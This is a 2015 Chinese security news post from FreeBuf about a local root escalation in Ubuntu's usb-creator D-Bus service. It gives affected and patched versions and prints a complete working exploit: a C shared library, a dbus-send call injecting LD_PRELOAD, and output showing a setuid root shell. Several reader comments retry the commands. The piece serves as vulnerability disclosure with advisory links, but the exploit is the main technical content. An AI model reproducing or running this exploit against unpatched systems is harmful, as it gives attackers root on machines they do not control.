ubuntu12.04

ubuntu12.04
FB招聘站
分类阅读
专栏
公开课
FIT 2019
企业服务
用户服务
搜索
投稿
登录
注册
Ubuntu曝本地权限提升漏洞，影响12.04 – 14.10版本（含EXP） phper认证作者2015-04-24共313375人围观 ，发现 15 个不明物体 漏洞系统安全
ubuntu.jpg

今天Ubuntu12.04-14.10曝出本地权限提升漏洞，该漏洞由Google的大神Tavis Ormandy发出，包含漏洞利用测试程序。

漏洞等级：

高危

影响范围

Ubuntu Precise (12.04LTS) <= usb-creator: 0.2.38.3ubuntu (Patched in: 0.2.38.3ubuntu0.1) Ubuntu Trusty (14.04LTS) <= usb-creator 0.2.56.3ubuntu (Patched in: 0.2.56.3ubuntu0.1) Ubuntu Utopic (14.10) <= usb-creator 0.2.62ubuntu0.2 (Patched in: 0.2.62ubuntu0.3) 漏洞测试EXP $ cat > test.c
void __attribute__((constructor)) init (void)
{
chown("/tmp/test", 0, 0);
chmod("/tmp/test", 04755);
}
^D
$ gcc -shared -fPIC -o /tmp/test.so test.c
$ cp /bin/sh /tmp/test
$ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator /com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"
method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
$ ls -l /tmp/test
-rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
$ /tmp/test
# id
euid=0(root) groups=0(root)
更多资料： http://www.openwall.com/lists/oss-security/2015/04/22/12
漏洞报告: https://bugs.launchpad.net/ubuntu/vivid/+source/usb-creator/+bug/1447396

*消息来源FreeBuf小酒馆，转载须注明来自FreeBuf黑客与极客（FreeBuf.COM）

phper
phper
127 篇文章
等级： 7级
||
上一篇：安卓WiFi管理组件wpa_supplicant存在高危漏洞，可导致泄露内存信息、DoS拒绝服务或任意代码执行下一篇：流行iOS网络通信库AFNetworking曝SSL漏洞，影响银联、中国银行、交通银行在内的2.5万个iOS应用
这些评论亮了

root 回复
@ wenjian_tk0 输入root的密码，你就发现你提权成功了哦
)10(亮了
发表评论已有 15 条评论

evil_xi4oyu 2015-04-24回复 1楼
这玩意默认不安装吧

亮了(3)

茱宝爹 2015-04-24回复 2楼
不准干坏事！ 回去试一试。 ubuntu漏洞

亮了(1)

nihaoxiongfei 2015-04-24回复 3楼
mark

亮了(1)

打打玩 2015-04-24回复 4楼
阿瓦达

亮了(1)

siyuAno_0 2015-04-24回复 5楼
威武

亮了(1)

Depth优秀的好小伙 2015-04-24回复 6楼
偷笑

作者的测试机跟我不是一个世界的

亮了(0)

LogHorizon_Cyrils 2015-04-24回复 7楼
[笑cry][笑cry][笑cry]

亮了(0)

阿凡达爱吃鱿鱼 2015-04-24回复 8楼
晚上试了，没成功衰

亮了(0)

不可思议q的瑜瑜酱 2015-04-25回复 9楼
简直就是大爱啊，好喜欢看的，超级赞的啊

亮了(0)

沙狐 (1级) 2015-04-25回复 10楼
刚换系统

亮了(0)

河蟹 2015-04-25回复 11楼
测试失败, Ubuntu13.10(XFCE)和Ubuntu14.10(Server)

cc@ubuntu1310:~$ cat > test.c

void __attribute__((constructor)) init (void)

{

chown("/tmp/test", 0, 0);

chmod("/tmp/test", 04755);

}

gcc -shared -fPIC -o /tmp/test.so test.c

^C

cc@ubuntu1310:~$ cat > test.c

^C

cc@ubuntu1310:~$ cat /etc/issue

Ubuntu 13.10 \n \l

cc@ubuntu1310:~$ uname -a

Linux ubuntu1310 3.11.0-12-generic #19-Ubuntu SMP Wed Oct 9 16:20:46 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux

cc@ubuntu1310:~$ cat > test.c

void __attribute__((constructor)) init (void)

{

chown("/tmp/test", 0, 0);

chmod("/tmp/test", 04755);

}

cc@ubuntu1310:~$ gcc -shared -fPIC -o /tmp/test.so test.c

cc@ubuntu1310:~$ cp /bin/sh /tmp/test

cc@ubuntu1310:~$ dbus-send –print-reply –system –dest=com.ubuntu.USBCreator /com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so" method return sender=:1.4364 -> dest=:1.7427 reply_serial=2

dbus-send: Data item "method" is badly formed

cc@ubuntu1310:~$ dbus-send –print-reply –system –dest=com.ubuntu.USBCreator /com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"method return sender=:1.4364 -> dest=:1.7427 reply_serial=2

dbus-send: Data item "return" is badly formed

cc@ubuntu1310:~$ dbus-send –print-reply –system –dest=com.ubuntu.USBCreator /com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"

Error org.freedesktop.DBus.Error.ServiceUnknown: The name com.ubuntu.USBCreator was not provided by any .service files

cc@ubuntu1310:~$ /tmp/test

$

亮了(2)

123 2015-04-25回复 12楼
freebsd ~ ~ ~

亮了(0)

wenjian_tk0 (2级) if NULL === NULL 2015-04-27回复 13楼

亮了(0)

root 2015-04-27回复
@ wenjian_tk0 输入root的密码，你就发现你提权成功了哦

亮了(10)

430工程 (1级) 2015-04-27回复 14楼
执行dbus-send –print-reply –system –dest=com.ubuntu.USBCreator /com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"命令会报错如下:

Error org.freedesktop.DBus.Error.UnknownMethod: Method "Get" with signature "ss" on interface "org.freedesktop.DBus.Properties" doesn’t exist

求解.

亮了(0)
昵称
请输入昵称
必须您当前尚未登录。登陆？注册邮箱
请输入邮箱地址
必须（保密）表情插图
有人回复时邮件通知我
phper
phper认证作者

《程序员》杂志编辑

127
文章数
27
评论数
最近文章
Linux系统安全检查工具Lynis 2.4.8发布
2017.04.25

这个工具能帮你识别藏在CloudFlare后的真实IP - HatCloud
2017.04.22

sudo-snooper：一款伪装成sudo命令的“蜜罐”脚本
2016.10.22

浏览更多
相关阅读
OpenSSL又出新漏洞，超过1100万https站点受影响13年前的安全配置缺陷仍影响着目前多数SAP系统渗透小技巧一则最具同情心的勒索软件套件PhiladelphiaWindows Zero-Day漏洞（CVE-2016-0167）：攻击支付卡数据
特别推荐

关注我们 分享每日精选文章

活动预告
11月

FreeBuf精品公开课·双11学习狂欢节 | 给努力的你打打气
已结束
10月

【16课时-连载中】挖掘CVE不是梦（系列课程2）
已结束
10月

【首节课仅需1元】挖掘CVE不是梦
已结束
9月

【已结束】自炼神兵之自动化批量刷SRC
已结束
FREEBUF免责声明协议条款关于我们加入我们广告及服务寻求报道广告合作联系我们友情链接关注我们
官方微信
新浪微博腾讯微博Twitter赞助商
Copyright © 2018 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号
css.php 正在加载中...0daybank